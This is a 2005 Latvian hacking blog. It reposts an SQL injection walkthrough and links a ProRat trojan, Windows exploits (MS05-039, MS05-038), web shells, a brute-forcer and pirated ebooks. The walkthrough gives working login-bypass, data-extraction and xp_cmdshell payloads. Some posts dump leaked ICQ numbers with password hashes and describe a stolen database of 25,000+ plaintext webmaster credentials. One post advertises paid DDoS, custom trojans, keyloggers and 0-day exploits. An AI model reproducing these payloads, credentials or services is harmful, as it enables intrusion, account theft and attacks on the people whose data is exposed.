    203.219.104.238:80
    Valsts=AU

    203.90.119.34:80
    Valsts=IN

    206.49.140.162:80
    Valsts=CO

    218.56.32.230:8080
    Valsts=CN

    203.162.92.126:8080
    Valsts=VN

    210.82.214.235:80
    Valsts=CN

    210.21.227.199:8080
    Valsts=CN

    Rita def


    Sodien no rita nemu un urkejos ap Cpaneli , tad gala rezultata piemekleju gatavu variantu
  • sheit


  • Katra zina uz def man pamudinaja kads cilveks kas sudzejas ka redz tas to un ta un shita, principa man galigi tie visi stasti po* , tik shorit gan uzsita mazliet asinis ka redz kaut kadi algotie pirms tam hakeri ,neesot varejushi paveikt lapas indexaciju:)
    Nezinu gan ar kadiem cilvekiem vinjsh bija runajis, noteikti ka no masas kuri pashi patstavigi kaut ko diedele , bet ja atrod kadu kas zin mazliet mazak par viniem, tad vini jau sevi iecel 3lit3:)
    Def. nav mans darbs katra zinja parmainas pec , bet ta tas ir parak apnicigs pasakums vakt kaut kadu skaitu lai redz butu krutaks par kadu t33mu vai kadu vel uber-lauzni.
    Def, var katrs treshais tik drosu pasakumu var uzturet tikai katrs 300000 :)

    Monday, August 15, 2005

    SQL Injection Walkthrough

    SQL Injection Walkthrough by SK

    1.0 Introduction
    When a machine has only port 80 opened, your most trusted vulnerability scanner cannot return anything useful, and you know that the admin always patch his server, we have to turn to web hacking. SQL injection is one of type of web hacking that require nothing but port 80 and it might just work even if the admin is patch-happy. It attacks on the web application (like ASP, JSP, PHP, CGI, etc) itself rather than on the web server or services running in the OS.

    This article does not introduce anything new, SQL injection has been widely written and used in the wild. We wrote the article because we would like to document some of our pen-test using SQL injection and hope that it may be of some use to others. You may find a trick or two but please check out the "9.0 Where can I get more info?" for people who truly deserve credit for developing many techniques in SQL injection.

    1.1 What is SQL Injection?
    It is a trick to inject SQL query/command as an input possibly via web pages. Many web pages take parameters from web user, and make SQL query to the database. Take for instance when a user login, web page that user name and password and make SQL query to the database to check if a user has valid name and password. With SQL Injection, it is possible for us to send crafted user name and/or password field that will change the SQL query and thus grant us something else.

    1.2 What do you need?
    Any web browser.

    2.0 What you should look for?
    Try to look for pages that allow you to submit data, i.e: login page, search page, feedback, etc. Sometimes, HTML pages use POST command to send parameters to another ASP page. Therefore, you may not see the parameters in the URL. However, you can check the source code of the HTML, and look for "FORM" tag in the HTML code. You may find something like this in some HTML codes:




    Everything between the
    and
    have potential parameters that might be useful (exploit wise).


    2.1 What if you can't find any page that takes input?
    You should look for pages like ASP, JSP, CGI, or PHP web pages. Try to look especially for URL that takes parameters, like:

    http://duck/index.asp?id=10

    3.0 How do you test if it is vulnerable?
    Start with a single quote trick. Input something like:

    hi' or 1=1--

    Into login, or password, or even in the URL. Example:
    - Login: hi' or 1=1--
    - Pass: hi' or 1=1--
    - http://duck/index.asp?id=hi' or 1=1--

    If you must do this with a hidden field, just download the source HTML from the site, save it in your hard disk, modify the URL and hidden field accordingly. Example:





    If luck is on your side, you will get login without any login name or password.

    3.1 But why ' or 1=1--?
    Let us look at another example why ' or 1=1-- is important. Other than bypassing login, it is also possible to view extra information that is not normally available. Take an asp page that will link you to another page with the following URL:

    http://duck/index.asp?category=food

    In the URL, 'category' is the variable name, and 'food' is the value assigned to the variable. In order to do that, an ASP might contain the following code (OK, this is the actual code that we created for this exercise):

    v_cat = request("category")
    sqlstr="SELECT * FROM product WHERE PCategory='" & v_cat & "'"
    set rs=conn.execute(sqlstr)

    As we can see, our variable will be wrapped into v_cat and thus the SQL statement should become:

    SELECT * FROM product WHERE PCategory='food'

    The query should return a resultset containing one or more rows that match the WHERE condition, in this case, 'food'.

    Now, assume that we change the URL into something like this:

    http://duck/index.asp?category=food' or 1=1--

    Now, our variable v_cat equals to "food' or 1=1-- ", if we substitute this in the SQL query, we will have:

    SELECT * FROM product WHERE PCategory='food' or 1=1--'

    The query now should now select everything from the product table regardless if PCategory is equal to 'food' or not. A double dash "--" tell MS SQL server ignore the rest of the query, which will get rid of the last hanging single quote ('). Sometimes, it may be possible to replace double dash with single hash "#".

    However, if it is not an SQL server, or you simply cannot ignore the rest of the query, you also may try

    ' or 'a'='a

    The SQL query will now become:

    SELECT * FROM product WHERE PCategory='food' or 'a'='a'

    It should return the same result.

    Depending on the actual SQL query, you may have to try some of these possibilities:

    ' or 1=1--
    " or 1=1--
    or 1=1--
    ' or 'a'='a
    " or "a"="a
    ') or ('a'='a

    4.0 How do I get remote execution with SQL injection?
    Being able to inject SQL command usually mean, we can execute any SQL query at will. Default installation of MS SQL Server is running as SYSTEM, which is equivalent to Administrator access in Windows. We can use stored procedures like master..xp_cmdshell to perform remote execution:

    '; exec master..xp_cmdshell 'ping 10.10.1.2'--

    Try using double quote (") if single quote (') is not working.

    The semi colon will end the current SQL query and thus allow you to start a new SQL command. To verify that the command executed successfully, you can listen to ICMP packet from 10.10.1.2, check if there is any packet from the server:

    #tcpdump icmp

    If you do not get any ping request from the server, and get error message indicating permission error, it is possible that the administrator has limited Web User access to these stored procedures.

    5.0 How to get output of my SQL query?
    It is possible to use sp_makewebtask to write your query into an HTML:

    '; EXEC master..sp_makewebtask "\\10.10.1.3\share\output.html", "SELECT * FROM INFORMATION_SCHEMA.TABLES"

    But the target IP must folder "share" sharing for Everyone.

    6.0 How to get data from the database using ODBC error message
    We can use information from error message produced by the MS SQL Server to get almost any data we want. Take the following page for example:

    http://duck/index.asp?id=10

    We will try to UNION the integer '10' with another string from the database:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES--

    The system table INFORMATION_SCHEMA.TABLES contains information of all tables in the server. The TABLE_NAME field obviously contains the name of each table in the database. It was chosen because we know it always exists. Our query:

    SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES-

    This should return the first table name in the database. When we UNION this string value to an integer 10, MS SQL Server will try to convert a string (nvarchar) to an integer. This will produce an error, since we cannot convert nvarchar to int. The server will display the following error:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'table1' to a column of data type int.
    /index.asp, line 5

    The error message is nice enough to tell us the value that cannot be converted into an integer. In this case, we have obtained the first table name in the database, which is "table1".

    To get the next table name, we can use the following query:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('table1')--

    We also can search for data using LIKE keyword:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME LIKE '%25login%25'--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'admin_login' to a column of data type int.
    /index.asp, line 5

    The matching patent, '%25login%25' will be seen as %login% in SQL Server. In this case, we will get the first table name that matches the criteria, "admin_login".

    6.1 How to mine all column names of a table?
    We can use another useful table INFORMATION_SCHEMA.COLUMNS to map out all columns name of a table:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login'--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_id' to a column of data type int.
    /index.asp, line 5

    Now that we have the first column name, we can use NOT IN () to get the next column name:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id')--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'login_name' to a column of data type int.
    /index.asp, line 5

    When we continue further, we obtained the rest of the column name, i.e. "password", "details". We know this when we get the following error message:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 COLUMN_NAME FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME='admin_login' WHERE COLUMN_NAME NOT IN ('login_id','login_name','password',details')--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
    [Microsoft][ODBC SQL Server Driver][SQL Server]ORDER BY items must appear in the select list if the statement contains a UNION operator.
    /index.asp, line 5

    6.2 How to retrieve any data we want?
    Now that we have identified some important tables, and their column, we can use the same technique to gather any information we want from the database.

    Now, let's get the first login_name from the "admin_login" table:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'neo' to a column of data type int.
    /index.asp, line 5

    We now know there is an admin user with the login name of "neo". Finally, to get the password of "neo" from the database:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='neo'--

    Output:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'm4trix' to a column of data type int.
    /index.asp, line 5

    We can now login as "neo" with his password "m4trix".

    6.3 How to get numeric string value?
    There is limitation with the technique describe above. We cannot get any error message if we are trying to convert text that consists of valid number (character between 0-9 only). Let say we are trying to get password of "trinity" which is "31173":

    http://duck/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login where login_name='trinity'--

    We will probably get a "Page Not Found" error. The reason being, the password "31173" will be converted into a number, before UNION with an integer (10 in this case). Since it is a valid UNION statement, SQL server will not throw ODBC error message, and thus, we will not be able to retrieve any numeric entry.

    To solve this problem, we can append the numeric string with some alphabets to make sure the conversion fail. Let us try this query instead:

    http://duck/index.asp?id=10 UNION SELECT TOP 1 convert(int, password%2b'%20morpheus') FROM admin_login where login_name='trinity'--

    We simply use a plus sign (+) to append the password with any text we want. (ASSCII code for '+' = 0x2b). We will append '(space)morpheus' into the actual password. Therefore, even if we have a numeric string '31173', it will become '31173 morpheus'. By manually calling the convert() function, trying to convert '31173 morpheus' into an integer, SQL Server will throw out ODBC error message:

    Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
    [Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value '31173 morpheus' to a column of data type int.
    /index.asp, line 5

    Now, you can even login as 'trinity' with the password '31173'.

    7.0 How to update/insert data into the database?
    When we successfully gather all column name of a table, it is possible for us to UPDATE or even INSERT a new record in the table. For example, to change password for "neo":

    http://duck/index.asp?id=10; UPDATE 'admin_login' SET 'password' = 'newpas5' WHERE login_name='neo'--

    To INSERT a new record into the database:

    http://duck/index.asp?id=10; INSERT INTO 'admin_login' ('login_id', 'login_name', 'password', 'details') VALUES (666,'neo2','newpas5','NA')--

    We can now login as "neo2" with the password of "newpas5".

    8.0 How to avoid SQL Injection?
    Filter out character like single quote, double quote, slash, back slash, semi colon, extended character like NULL, carry return, new line, etc, in all strings from:
    - Input from users
    - Parameters from URL
    - Values from cookie

    For numeric value, convert it to an integer before parsing it into SQL statement. Or using ISNUMERIC to make sure it is an integer.

    Change "Startup and run SQL Server" using low privilege user in SQL Server Security tab.

    Delete stored procedures that you are not using like:

    master..Xp_cmdshell, xp_startmail, xp_sendmail, sp_makewebtask


    9.0 Where can I get more info?
    One of the earliest works on SQL Injection we have encountered should be the paper from Rain Forest Puppy about how he hacked PacketStorm.
    http://www.wiretrip.net/rfp/p/doc.asp?id=42&iface=6

    Great article on gathering information from ODBC error messages:
    http://www.blackhat.com/presentations/
    win-usa-01/Litchfield/BHWin01Litchfield.doc

    A good summary of SQL Injection on various SQL Server on
    http://www.owasp.org/asac/input_validation/sql.shtml

    Senseport's article on reading SQL Injection:
    http://www.sensepost.com/misc/SQLinsertion.htm

    Other worth readings:
    http://www.digitaloffense.net/
    wargames01/IOWargames.ppt
    http://www.wiretrip.net/rfp/p/
    doc.asp?id=7&iface=6
    http://www.wiretrip.net/rfp/p/
    doc.asp?id=60&iface=6
    http://www.spidynamics.com/whitepapers/
    WhitepaperSQLInjection.pdf

    IGC SE 1.01



    Laba alternativa slavenajam ICQ un uz dototo bridi daudz droshaka alternativa.

    sikak varat palasit un pasu peidzeri dabut: www.igchat.com

    Sunday, August 14, 2005

    ProRat 1.9 Special Edition




    Laikam bus piedodams "krustevam" no NetSec.lv par to ka kludijas izliekot nevis 1.6 se, bet gan public version. Cik zinu tad vinjam maz intrese vispar tadi trojas zirgi .
    Pedeja publiska relize ir ProRat v1.9 Fix2 un to var novilkt no autora saita par velti, ka ari atiecigo help/language failus.
  • sheit


  • Bet es jums izlikshu ProRat 1.9 SE( pedeja relize ir 2.0)
  • sheit



  • Kas attiecas uz downloadiem no email.su servera, ja nelauj tad droshi pameigginat velak , vienkarsi ta man ir ertak .

    Ja intrese kadi citi populari un mazak populari trojani/keylogeri droshi bez bailem izsakaties komentos.

    Google Hacker by dav

    Mazs vienkarsh toolis ar jau gatavam Google komandam, gan jau kadamam var noderet.


  • sheit
  • (MS05-039) exploit

    Pavisam piemrisu pateikt par otru exploitu prieks windas

    (MS05-039) Microsoft Windows Plug-and-Play Service Remote Overflow
    Universal Exploit + no crash shellcode

  • seit
  • Bezmaksas shellu provi

    http://sdf.lonestar.org
    http://atlantis.neoxys.org/
    http://www.chules.net/
    http://shells.oceanius.com/
    http://www.grex.org/
    http://www.nyx.net/
    http://m-net.arbornet.org/
    http://www.vectorstar.net/
    http://www.polarhome.com/
    http://vmsbox.cjb.net/
    http://www.titanix.net/
    http://nic-nac-project.de/
    http://deathrow.vistech.net/
    http://www.bur.st/
    http://aragon.marway.org/
    http://www.magnesium.net/
    http://www.65535.net/
    http://www.unixdaemons.com/
    http://shells.thinkgeek.co.uk/
    http://freeshell.celuloza.ro/
    http://www.silenceisdefeat.org/
    http://phynix.darkwired.org/
    http://www.zsuatt.org/
    http://www.rulex.net/
    http://www.aeshells.org/
    http://the1.no-ip.com/
    http://www.themlg.net/
    http://www.shellsnet.org/
    http://bsd.miki.eu.org/
    http://www.ductape.net/
    http://www.xox.pl/
    http://www.iprotection.com/
    http://www.marmoset.net/
    http://www.bru-noc.net/
    http://www.flame.org/
    http://www.takiweb.com/
    http://www.rootshell.be/
    http://www.daforest.org/

    Paris CGI ievainojamibas + 2 webshelli

    Paris cauru saitu ar .cgi ievainojamibam , iespeja izplidit nix comandas.

    un 2 webshelli jusu personigajam vajadzibam.

    Dzests

    IE COM Objects Instantiation Exploit (MS05-038)

    Pirms paris dienam iznacis jauns exploits prieksh IE, stradas uz
    5.01, 5.5, 6.x.

    seit

    Ebay.com source


    Pats gan neesmu es laidis vinu, bet teica ka t ir pilna source hvz, skatas apsi.
    Ka jus pieliteosiet un ka tabildesiet par sekam , diezvai man bus jums jasaka , pasi visu zinat.
    seit
    arhiva parole:
    www.pridels.blogspot.com

    DC++/no.lv turbo LOL


    LOL

    Katra zina ja tas bija Salvis pats ,tad man pat vardu trukst,lai varetu aprakstit tadu "vieglpratibu".

    21000+ lietotaju datubaze

    Iepazistinashu shoreiz ar vienu citu skriptu , tad kad mes nevaram atrast phpMyAdmin/vai ko tamlidzigu lai pabrozaetu kaut vai ka shini gadijuma lietotaju datubazi, RST puisi ir uzcepusi diezgan parocigu Mysql skriptu novilkt varat:seit

    dzivs piemers ir edonkeyargentina.com.ar MYSQL datubaze ar 21000+ lietotaju , icq numurinu miliem tur noteikti atradisies diezgan darba.
    Atri apskatot pamaniju ka viniem populars ir ICQ , tad pirmie kas patrapijas pa rokai:
    69696969;9739647982732b6a7d32c70ba126a88a
    99888855;c2c9320ea7f125af2f5ee7a27bebde4e
    285683;d5a8d0fa9e21186d40d5c05039dbade5
    554826;c212180c9a7c3f2ea41f3b93882db621
    19011000;3b76e3a59194a4ddc9ea022456e17bc9
    454545;4de9ae57c9c13829b4b35ac75e5ea2ce
    seit

    Saturday, August 13, 2005

    DeFaced E-zine n° 8 released!

    Undergounda lasamviela ,dazhreiz medz bus kaut kas intresants:

    seit

    zurnala iepriekshejie 1-7 numuri ir dabonami sheit.
    seit

    Anonym FTP conect trought web interface

    pashu php skriptu uzcepa pusihi no NST komandas.

    uzmetu uz pr0n servaka lai jus varetu notestet, cik ilgi tur vins metasies tas jau atkarigs no jums.

    Dzests

    Par avipreview / about avipreview

    Sakara ar to ka Avipreview.com nodarbojas ar gara laika ar trojanu izplatishanu ,panemu un uztaisiju redirektu uz manu blogu,lai bridinatu Tevi lasitaj par to ka vinu piedavata proga satur trojas zirgu.
    Diezvai es rikotos shadi, ja domatu ka webmasteri nav pie vainas , bet stirpi apshaubu to ka webmasteri nav bez vainas jo trojas zirgs nak komplekta jau aptuveni 1 menesi.
    Tapec droshi meklejiet citu alternativu sourci kur jus varat novilkt vinu progu.


    Dear reader, if you come to my blog cauz you was redirected from avipreview.com thats means that you must read next txt:

    avipreview.com in last month till now was added in they prog trojan horse and it was for public download , maybe you was one from them who downloaded.
    Thats why i made redirect to my blog to make attetion about that.
    To have trojan free avipreview version please search in alternative download sites.

    Earthlink.net whacker -[Earthlink.net -epastu lauznis]



    Tapat ka ir spec. yahoo/hotmail kur ar parastiem bruteriem neko iesakt nevar ta ari Earthlinkam ir vajadzigs spec bruteris, strada shis nevisai atri , bet lauzities var.

    seit

    Par Blogu.

    Vakar panemu uz atru roku un "uzcepu" so blogu ,cik man bija briva laika un velesanas mazliet iepazistinaju jus ar sekojosho sha bloga saturu ,tapec atri sanaca samest vienu pec otra psotus lai neizskats tik tukshi, protams droshi varat meilot man ar idejam/priekshlikumiem/aizradijumie/draudiem/novelejumiem/utt.
    Tapat ja ir kads ieintresets but par vienu no sha bloga autoriem droshi var apskatizt sekosjoshas prasibas.

    1. Velme rakstit/publicet/utt.
    2. Velme ziedot vismaz 30 minutes diena blogam.
    3. Iespejas dalities ar citeim ar noderigu informaciju.
    4. Drosme.
    5. Speja domat lidzigi un saprast tagadeja bloga ideju.

    web shellz

    Ta lai nebutu bijusi lieka muldeshana iedoshu vienu web-shellu prieks visparigas izglitosanas. Kapec tikai vienu?
    iedotu 100 vai 1000, tad tur jau vairs runa par izglitoshanas nebutu un plus atrastus visadi gudrinieki kas paspetu parpostet un kliegt kadi vini super-uber-hax0ri vai index3tu lapu un priecatos.
    Shis vienkarsh remview skripts ,kas ir pieejams publiski 4 free http://php.spb.ru/remview/
    tadu ir daudz 4 free und par maksu , vieniem ir mazak funkciju otriem vairak pats galvenais ka jus brivi staigajat pa serveri ,ja trukst tiesibu tad ta jau ir jusu problema,ne mana.

    Dzests

    25000+ webmasteru konti

    datubaze nemta no wwwtoolz.com, taja ietilpst vards,uzvards,logins,paroles,epasts,websaits,utt.
    Pats galvenais ka pwd ir plain txt formata.

    seit

    baze ir arhiveta .zip arhiva uz kura stav parole ,lai katrs kreisais nepelnitu ordenus, pasiem jums bus jatiek ar paroli gala , ja no arhiva parole sagada lielas problemas , tad mans meils ir r0t3d3vil at email.su

    PS. Datubaze tiek izsniegta tikai izglitojoshos nolukos.(tie butu piem. jusu wordlista papildinashnai.par defeisiem un citam mulkibam atbildesiet pashi)

    Network Security Bible Jan 2005

    Nekas jauns ,bet droshi vien kads palasit velesies.


    seit

    Velviens ebookz - HACKERS BLACK BOOK 2003 Edition

    Viegli lasams romans : 3.94 Mb

    seit

    eBookZ- 4 dummies [w4r3z]

    Mazliet e-gramatas prieksh iesacejiem un netikai .


    RFID For Dummies
    seit

    ______________________________
    Home.Networking.For.Dummies.Third.Edition.Apr.2005
    seit

    ______________________________
    A+.Certification.for.Dummies.,.3rd.Edition
    seit

    ______________________________
    Adobe.Illustrator.10.For.Dummies
    seit

    ______________________________
    AutoCAD.2004.For.Dummies
    seit

    ______________________________
    Buying.A.Computer.For.Dummies.2004.Edition
    seit

    ______________________________
    C++.for.Dummies.5th.Edition
    seit

    ______________________________
    Firewalls.For.Dummies.Second.Edition
    seit

    ______________________________
    Java.Game.Programming.For.Dummies
    seit

    ______________________________
    John.Wiley.And.Sons.Statistics.For.Dummies
    seit

    ______________________________
    Macromedia.Studio.MX.2004.For.Dummies
    seit

    ______________________________
    John.Wiley.&.Sons.3ds.max.5.for.Dummies
    seit

    ______________________________
    Wiley.-.Windows.Server.2003.For.Dummies
    seit

    ______________________________
    Java.All-In-One.Desk.Reference.For.Dummies.Apr.2005
    seit

    ______________________________
    Adobe Premiere Elements for Dummies
    seit

    ______________________________
    Creating Family Web Sites For Dummies
    seit

    seit

    ______________________________
    HDTV For Dummies
    seit

    ______________________________
    JavaScript for Dummies
    seit

    ______________________________
    Investing Online for Dummies
    seit

    ______________________________
    Poker for Dummies
    seit
    password if any: www.AvaxHome.ru

    ______________________________
    Hacking For Dummies
    seit

    ______________________________
    Europe For Dummies (Dummies Travel)
    seit
    PASSWORD: o0o|o0o(.)(e)(b)(0)(0)(k)(z)(.)o0o|o0o

    ______________________________
    For Dummies Visual C++ 6 For Dummies Quick Reference
    seit

    ______________________________
    Car Hacks and Mods for Dummies
    seit

    ______________________________
    Photoshop CS All-in-One Desk Reference for Dummies
    seit

    ______________________________
    Cleaning & Stain Removal for Dummies (For Dummies)
    seit

    ______________________________
    autocad 2005 for dummies
    seit

    ______________________________
    Troubleshooting your PC Feb 2005
    seit
    Part I: What the @#$%

    ______________________________
    Creating Webpages
    seit

    ______________________________
    Adobe.Illustrator.10.For.Dummies
    seit

    ______________________________
    Photoshop CS2 For Dummies (For Dummies (Computer/Tech))
    seit

    ______________________________
    Red Hat Linux Fedora for Dummies
    seit

    ______________________________
    Photoshop CS2 For Dummies mirror
    seit
    Passw: Mat.Riks.Info

    ______________________________
    Beginning Programming With Java for Dummies (For Dummies (Computer/Tech))
    seit

    ______________________________
    Nancy Stevenson, «WebEx Web Meetings For Dummies
    seit

    ______________________________
    Visual C++6 for Dummies
    seit
    password: Mat.Riks.Info

    ______________________________
    The Everyday Internet All-in-One Desk Reference For Dummies
    seit
    Password: ebooksclub.org

    ______________________________
    Buzz Marketing with Blogs For Dummies
    seit

    ______________________________
    Starting an Online Business for Dummies
    seit
    Password: www.AvaxHome.ru

    ______________________________
    Search Engine Optimization for Dummies
    seit

    ______________________________
    Blocking Spam and Spyware For Dummies
    seit
    pass:www.hotddls.com

    ______________________________
    IpodForDummies
    seit
    password: www.hotddls.com

    ______________________________
    Piano for Dummies
    seit
    Password:ebooksclub.tk

    FTP$kaz

    Neka ipasha, tikai izglitojoshos nolukos .

    Dzests

    LV tikls



    paris torrent trackeri,1,5 wareznieks,1 sec. saits kas par brinumu vel eksiste.
    Mani skar tas ka 99% LV cilveku tuse vai nu ieks .RU vai citur pasaule.
    3 reizes gada var pamanit kadu defeisu "Andri,pats vainigs atdod paradu!"
    Jeb Latvieshu uber-skaudiba , viens otru apdirsh ka vien var ar ceribu klut labaks.
    To ja kads dara to ko Tu nedari (negribot vai nevarot), nenozime ka cilveks dara nepareizi , bet Tu pareizi.
    Un ja nepklanisies ka nakas un nepateiksi 3 reizes "quu" , tad vispar pizdec .

    Pakalpojumi.

    DDOS - pirma diena 300$,nakamas 200$,ja vairak neka nedelu tad dienas cena 150$.

    Trojas zirgu,keylogeri pec pasutijuma , tapat iespejams jau gatavu produktu modificeshana pec jusu velmem.

    0-dayz exploiti, tapat pec pasutijuma .


    r0t3d3vil at email.su

    Friday, August 12, 2005

    Bruteforce Cat 2.0


    ICQ numurini

    ICQ - numurini,iemetu seit paris paraugus protams bez ipashnieku zinas kam vajag tie nem sev vajadzigo numuru, kam nevajag tie iet talak vai ie4ekojiet paroles.
    Tas ir tikai sakums domaju patstavigi iemest kadu hack/crack halvu kas man nebus intresanta (shellus,e-pastus,ftp un citus kontus)


    Dzests

    Ievads un noteikumi.

    Sis blogs nav pielidzinams kaut kadam normam vai likumiem un izveides ideja ir personiga gariga pilnveidoshanas.
    Blogs jums bus pieejams lidz tam bridim kamer vini tiesibsargajosas instances vai hosteris neaizklapes ciet.
    Par sekam no sha bloga pieejamas informacijas izmantoshanu jus atbildat pashi , neviens nelika jums sheit nakt vai kaut ko izmantot.
    Bloga ipashnieks tapat ari hosteris neuznjemas nekadu atbildibu par bloga posteta izrietoshajam sekam.
    Shis ir privats pasakums!


    Pridels

     
    Copyright (c) 2006 Pridels Sec Crew